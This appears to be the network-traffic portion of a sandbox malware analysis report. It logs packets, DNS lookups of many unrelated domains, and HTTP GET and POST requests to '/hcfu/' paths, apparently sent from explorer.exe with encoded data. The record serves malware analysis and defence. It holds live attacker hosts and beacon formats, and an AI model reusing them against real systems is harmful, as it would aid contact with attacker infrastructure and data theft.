Oct 24, 2022 11:07:48.869230032 CEST	49719	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:49.885392904 CEST	49720	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:50.050400972 CEST	80	49720	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:50.052958965 CEST	49720	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:50.053051949 CEST	49720	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:50.217675924 CEST	80	49720	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:50.331476927 CEST	80	49720	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:50.331542015 CEST	80	49720	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:50.331753969 CEST	49720	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:50.333151102 CEST	49720	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:50.498226881 CEST	80	49720	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:55.513997078 CEST	49721	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:55.577821970 CEST	80	49721	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:55.578142881 CEST	49721	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:55.578289032 CEST	49721	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:55.639724016 CEST	80	49721	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:55.639941931 CEST	80	49721	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:55.639956951 CEST	80	49721	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:55.640063047 CEST	49721	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:56.588466883 CEST	49721	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:57.605093956 CEST	49722	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:57.666810036 CEST	80	49722	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:57.666930914 CEST	49722	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:57.667169094 CEST	49722	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:57.728651047 CEST	80	49722	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:57.730324030 CEST	80	49722	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:57.730376959 CEST	80	49722	185.106.208.3	192.168.2.7
Oct 24, 2022 11:07:57.730541945 CEST	49722	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:57.730700016 CEST	49722	80	192.168.2.7	185.106.208.3
Oct 24, 2022 11:07:57.793538094 CEST	80	49722	185.106.208.3	192.168.2.7
Oct 24, 2022 11:08:02.850239992 CEST	49723	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:02.899195910 CEST	80	49723	85.159.66.93	192.168.2.7
Oct 24, 2022 11:08:02.899418116 CEST	49723	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:02.899678946 CEST	49723	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:02.948254108 CEST	80	49723	85.159.66.93	192.168.2.7
Oct 24, 2022 11:08:02.999944925 CEST	80	49723	85.159.66.93	192.168.2.7
Oct 24, 2022 11:08:03.000184059 CEST	49723	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:03.902054071 CEST	49723	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:04.917803049 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:04.968261003 CEST	80	49724	85.159.66.93	192.168.2.7
Oct 24, 2022 11:08:04.968424082 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:04.968530893 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:05.245462894 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:05.557949066 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:06.167383909 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:07.370493889 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:08.573793888 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:09.777018070 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:12.183487892 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:16.996413946 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:26.606523991 CEST	49724	80	192.168.2.7	85.159.66.93
Oct 24, 2022 11:08:31.838947058 CEST	49725	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:31.997832060 CEST	80	49725	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:31.998032093 CEST	49725	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:31.998338938 CEST	49725	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:32.156985998 CEST	80	49725	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:32.157023907 CEST	80	49725	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:32.157044888 CEST	80	49725	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:32.157160044 CEST	49725	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:33.022034883 CEST	49725	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:34.033540010 CEST	49726	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:34.191699982 CEST	80	49726	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:34.193238020 CEST	49726	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:34.199551105 CEST	49726	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:34.357630014 CEST	80	49726	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:34.357724905 CEST	80	49726	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:34.357747078 CEST	80	49726	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:34.357964039 CEST	49726	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:34.360742092 CEST	49726	80	192.168.2.7	38.40.162.145
Oct 24, 2022 11:08:34.518848896 CEST	80	49726	38.40.162.145	192.168.2.7
Oct 24, 2022 11:08:39.414619923 CEST	49727	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:39.459480047 CEST	80	49727	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:39.459702015 CEST	49727	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:39.459991932 CEST	49727	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:39.504735947 CEST	80	49727	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:39.506207943 CEST	80	49727	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:39.506246090 CEST	80	49727	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:39.506356955 CEST	49727	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:40.467401028 CEST	49727	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:41.483860970 CEST	49728	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:41.530419111 CEST	80	49728	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:41.530544043 CEST	49728	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:41.530699968 CEST	49728	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:41.577536106 CEST	80	49728	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:41.578249931 CEST	80	49728	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:41.578284025 CEST	80	49728	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:41.578499079 CEST	49728	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:41.578687906 CEST	49728	80	192.168.2.7	63.32.216.166
Oct 24, 2022 11:08:41.624893904 CEST	80	49728	63.32.216.166	192.168.2.7
Oct 24, 2022 11:08:46.748832941 CEST	49729	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:46.866606951 CEST	80	49729	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:46.866820097 CEST	49729	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:46.866925955 CEST	49729	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:46.989604950 CEST	80	49729	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:46.989639997 CEST	80	49729	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:46.989841938 CEST	49729	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:47.874614954 CEST	49729	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:48.890495062 CEST	49730	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:49.003293991 CEST	80	49730	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:49.003586054 CEST	49730	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:49.003710032 CEST	49730	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:49.113472939 CEST	80	49730	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:49.113544941 CEST	80	49730	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:49.113651991 CEST	49730	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:49.113775015 CEST	49730	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:49.113950014 CEST	49730	80	192.168.2.7	193.141.64.241
Oct 24, 2022 11:08:49.221246004 CEST	80	49730	193.141.64.241	192.168.2.7
Oct 24, 2022 11:08:54.560571909 CEST	49731	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:54.727369070 CEST	80	49731	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:54.727504015 CEST	49731	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:54.727700949 CEST	49731	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:54.894166946 CEST	80	49731	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:54.929811001 CEST	80	49731	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:54.929846048 CEST	80	49731	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:54.929932117 CEST	49731	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:55.734170914 CEST	49731	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:56.750365973 CEST	49732	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:56.920522928 CEST	80	49732	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:56.920649052 CEST	49732	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:56.920855999 CEST	49732	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:57.090774059 CEST	80	49732	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:57.125719070 CEST	80	49732	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:57.125756025 CEST	80	49732	103.175.163.144	192.168.2.7
Oct 24, 2022 11:08:57.125946999 CEST	49732	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:57.130913973 CEST	49732	80	192.168.2.7	103.175.163.144
Oct 24, 2022 11:08:57.300880909 CEST	80	49732	103.175.163.144	192.168.2.7
Oct 24, 2022 11:09:02.297950029 CEST	49733	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:02.446589947 CEST	80	49733	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:02.446686029 CEST	49733	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:02.446844101 CEST	49733	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:02.595554113 CEST	80	49733	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:02.595745087 CEST	80	49733	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:02.595767975 CEST	80	49733	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:02.595841885 CEST	49733	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:03.453675032 CEST	49733	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:04.469867945 CEST	49734	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:04.619251013 CEST	80	49734	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:04.619574070 CEST	49734	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:04.619981050 CEST	49734	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:04.768899918 CEST	80	49734	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:04.769951105 CEST	80	49734	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:04.769970894 CEST	80	49734	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:04.770124912 CEST	49734	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:04.770284891 CEST	49734	80	192.168.2.7	3.13.90.76
Oct 24, 2022 11:09:04.919198990 CEST	80	49734	3.13.90.76	192.168.2.7
Oct 24, 2022 11:09:14.611191988 CEST	49735	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:09:14.766963005 CEST	80	49735	74.124.203.191	192.168.2.7
Oct 24, 2022 11:09:14.768192053 CEST	49735	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:09:14.768256903 CEST	49735	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:09:14.923847914 CEST	80	49735	74.124.203.191	192.168.2.7
Oct 24, 2022 11:09:14.928173065 CEST	80	49735	74.124.203.191	192.168.2.7
Oct 24, 2022 11:09:14.928250074 CEST	80	49735	74.124.203.191	192.168.2.7
Oct 24, 2022 11:09:14.928389072 CEST	49735	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:09:14.928479910 CEST	49735	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:09:15.085319042 CEST	80	49735	74.124.203.191	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2022 11:06:40.912744999 CEST	56588	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:06:41.021518946 CEST	53	56588	8.8.8.8	192.168.2.7
Oct 24, 2022 11:06:51.880213976 CEST	60326	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:06:51.993412971 CEST	53	60326	8.8.8.8	192.168.2.7
Oct 24, 2022 11:06:59.673032045 CEST	50835	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:06:59.697439909 CEST	53	50835	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:06.814112902 CEST	50505	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:06.982827902 CEST	53	50505	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:15.027230978 CEST	61178	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:15.065758944 CEST	53	61178	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:22.265661955 CEST	63926	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:22.711004019 CEST	53	63926	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:30.440331936 CEST	53336	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:30.702399969 CEST	53	53336	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:38.419377089 CEST	51007	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:38.703541040 CEST	53	51007	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:47.643431902 CEST	50513	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:47.691220999 CEST	53	50513	8.8.8.8	192.168.2.7
Oct 24, 2022 11:07:55.346308947 CEST	60765	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:07:55.512693882 CEST	53	60765	8.8.8.8	192.168.2.7
Oct 24, 2022 11:08:02.775810957 CEST	58283	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:08:02.849001884 CEST	53	58283	8.8.8.8	192.168.2.7
Oct 24, 2022 11:08:31.657850027 CEST	50024	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:08:31.837651014 CEST	53	50024	8.8.8.8	192.168.2.7
Oct 24, 2022 11:08:39.379663944 CEST	49516	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:08:39.412467957 CEST	53	49516	8.8.8.8	192.168.2.7
Oct 24, 2022 11:08:46.620500088 CEST	62679	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:08:46.747519016 CEST	53	62679	8.8.8.8	192.168.2.7
Oct 24, 2022 11:08:54.131541967 CEST	61392	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:08:54.555255890 CEST	53	61392	8.8.8.8	192.168.2.7
Oct 24, 2022 11:09:02.176836967 CEST	52104	53	192.168.2.7	8.8.8.8
Oct 24, 2022 11:09:02.296693087 CEST	53	52104	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2022 11:06:40.912744999 CEST	192.168.2.7	8.8.8.8	0xca3	Standard query (0)	www.wewantabreak.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:06:51.880213976 CEST	192.168.2.7	8.8.8.8	0x7a18	Standard query (0)	www.modbox.site	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:06:59.673032045 CEST	192.168.2.7	8.8.8.8	0x571	Standard query (0)	www.occludy.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:06.814112902 CEST	192.168.2.7	8.8.8.8	0xdb48	Standard query (0)	www.patrickguarte.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:15.027230978 CEST	192.168.2.7	8.8.8.8	0x4af	Standard query (0)	www.opulentdome.uk	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:22.265661955 CEST	192.168.2.7	8.8.8.8	0x828	Standard query (0)	www.malaya.live	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:30.440331936 CEST	192.168.2.7	8.8.8.8	0x289e	Standard query (0)	www.nnncb.top	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:38.419377089 CEST	192.168.2.7	8.8.8.8	0xe4e5	Standard query (0)	www.majordaiyanoace.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:47.643431902 CEST	192.168.2.7	8.8.8.8	0x1b88	Standard query (0)	www.bandmarket.live	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:55.346308947 CEST	192.168.2.7	8.8.8.8	0xe489	Standard query (0)	www.aurakids.website	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:02.775810957 CEST	192.168.2.7	8.8.8.8	0x360e	Standard query (0)	www.parkperge.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:31.657850027 CEST	192.168.2.7	8.8.8.8	0xda2f	Standard query (0)	www.paulmontecalvo.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:39.379663944 CEST	192.168.2.7	8.8.8.8	0x241	Standard query (0)	www.lilustrlousdates.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:46.620500088 CEST	192.168.2.7	8.8.8.8	0x6b6a	Standard query (0)	www.montazeran.net	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:54.131541967 CEST	192.168.2.7	8.8.8.8	0xed26	Standard query (0)	www.khelojeetopro.com	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:09:02.176836967 CEST	192.168.2.7	8.8.8.8	0x5172	Standard query (0)	www.biggaming.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2022 11:06:41.021518946 CEST	8.8.8.8	192.168.2.7	0xca3	No error (0)	www.wewantabreak.com	wewantabreak.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:06:41.021518946 CEST	8.8.8.8	192.168.2.7	0xca3	No error (0)	wewantabreak.com		74.124.203.191	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:06:51.993412971 CEST	8.8.8.8	192.168.2.7	0x7a18	No error (0)	www.modbox.site		66.96.162.130	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:06:59.697439909 CEST	8.8.8.8	192.168.2.7	0x571	No error (0)	www.occludy.com		217.160.0.87	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:06.982827902 CEST	8.8.8.8	192.168.2.7	0xdb48	No error (0)	www.patrickguarte.com		155.159.61.221	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:15.065758944 CEST	8.8.8.8	192.168.2.7	0x4af	No error (0)	www.opulentdome.uk		46.249.204.182	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:22.711004019 CEST	8.8.8.8	192.168.2.7	0x828	No error (0)	www.malaya.live	malaya.live		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:07:22.711004019 CEST	8.8.8.8	192.168.2.7	0x828	No error (0)	malaya.live		51.79.230.147	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:30.702399969 CEST	8.8.8.8	192.168.2.7	0x289e	No error (0)	www.nnncb.top		154.209.88.140	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:38.703541040 CEST	8.8.8.8	192.168.2.7	0xe4e5	No error (0)	www.majordaiyanoace.com	majordaiyanoace.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:07:38.703541040 CEST	8.8.8.8	192.168.2.7	0xe4e5	No error (0)	majordaiyanoace.com		150.95.59.33	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:47.691220999 CEST	8.8.8.8	192.168.2.7	0x1b88	No error (0)	www.bandmarket.live		192.64.116.149	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:07:55.512693882 CEST	8.8.8.8	192.168.2.7	0xe489	No error (0)	www.aurakids.website	aurakids.website		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:07:55.512693882 CEST	8.8.8.8	192.168.2.7	0xe489	No error (0)	aurakids.website		185.106.208.3	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:02.849001884 CEST	8.8.8.8	192.168.2.7	0x360e	No error (0)	www.parkperge.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:08:02.849001884 CEST	8.8.8.8	192.168.2.7	0x360e	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:08:02.849001884 CEST	8.8.8.8	192.168.2.7	0x360e	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:31.837651014 CEST	8.8.8.8	192.168.2.7	0xda2f	No error (0)	www.paulmontecalvo.com		38.40.162.145	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:39.412467957 CEST	8.8.8.8	192.168.2.7	0x241	No error (0)	www.lilustrlousdates.com	ndtnc.abimimojo2.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:08:39.412467957 CEST	8.8.8.8	192.168.2.7	0x241	No error (0)	ndtnc.abimimojo2.com	m1.mtrafficgeo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:08:39.412467957 CEST	8.8.8.8	192.168.2.7	0x241	No error (0)	m1.mtrafficgeo.com		63.32.216.166	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:46.747519016 CEST	8.8.8.8	192.168.2.7	0x6b6a	No error (0)	www.montazeran.net	montazeran.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:08:46.747519016 CEST	8.8.8.8	192.168.2.7	0x6b6a	No error (0)	montazeran.net		193.141.64.241	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:08:54.555255890 CEST	8.8.8.8	192.168.2.7	0xed26	No error (0)	www.khelojeetopro.com	khelojeetopro.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2022 11:08:54.555255890 CEST	8.8.8.8	192.168.2.7	0xed26	No error (0)	khelojeetopro.com		103.175.163.144	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:09:02.296693087 CEST	8.8.8.8	192.168.2.7	0x5172	No error (0)	www.biggaming.xyz		3.13.90.76	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:09:02.296693087 CEST	8.8.8.8	192.168.2.7	0x5172	No error (0)	www.biggaming.xyz		3.19.100.43	A (IP address)	IN (0x0001)	false
Oct 24, 2022 11:09:02.296693087 CEST	8.8.8.8	192.168.2.7	0x5172	No error (0)	www.biggaming.xyz		18.117.28.81	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.wewantabreak.com

www.modbox.site

www.occludy.com

www.patrickguarte.com

www.opulentdome.uk

www.malaya.live

www.nnncb.top

www.majordaiyanoace.com

www.bandmarket.live

www.aurakids.website

www.parkperge.com

www.paulmontecalvo.com

www.lilustrlousdates.com

www.montazeran.net

www.khelojeetopro.com

www.biggaming.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49704	74.124.203.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:06:41.189100981 CEST	350	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ HTTP/1.1 Host: www.wewantabreak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:06:41.346854925 CEST	351	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:06:41 GMT Server: Apache Content-Length: 236 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49705	66.96.162.130	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:06:52.149022102 CEST	352	OUT	POST /hcfu/ HTTP/1.1 Host: www.modbox.site Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.modbox.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.modbox.site/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 28 61 50 65 70 73 5a 53 75 53 79 67 50 6c 59 5f 63 53 30 76 75 6a 4a 2d 47 50 38 63 35 64 54 30 31 71 75 4f 75 4f 65 54 46 34 56 72 33 62 4c 6d 41 77 35 47 69 56 38 66 55 38 4e 33 4a 69 37 6e 7e 46 63 49 6f 63 75 6d 48 62 79 4c 4c 48 4e 74 78 4e 73 75 43 63 46 56 64 70 7a 5f 37 79 46 4f 7a 57 57 65 62 53 6c 55 64 67 4e 41 55 66 45 43 63 73 67 4c 46 6a 32 62 7e 66 39 61 30 72 4b 6d 50 50 74 64 64 37 78 6a 50 76 45 30 6b 31 56 66 79 39 79 67 62 52 65 62 70 4c 4f 78 77 35 35 5f 6a 55 36 74 31 5f 31 53 6d 49 74 69 4e 62 4b 62 6b 39 70 50 7a 77 55 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=(aPepsZSuSygPlY_cS0vujJ-GP8c5dT01quOuOeTF4Vr3bLmAw5GiV8fU8N3Ji7n~FcIocumHbyLLHNtxNsuCcFVdpz_7yFOzWWebSlUdgNAUfECcsgLFj2b~f9a0rKmPPtdd7xjPvE0k1Vfy9ygbRebpLOxw55_jU6t1_1SmItiNbKbk9pPzwU.
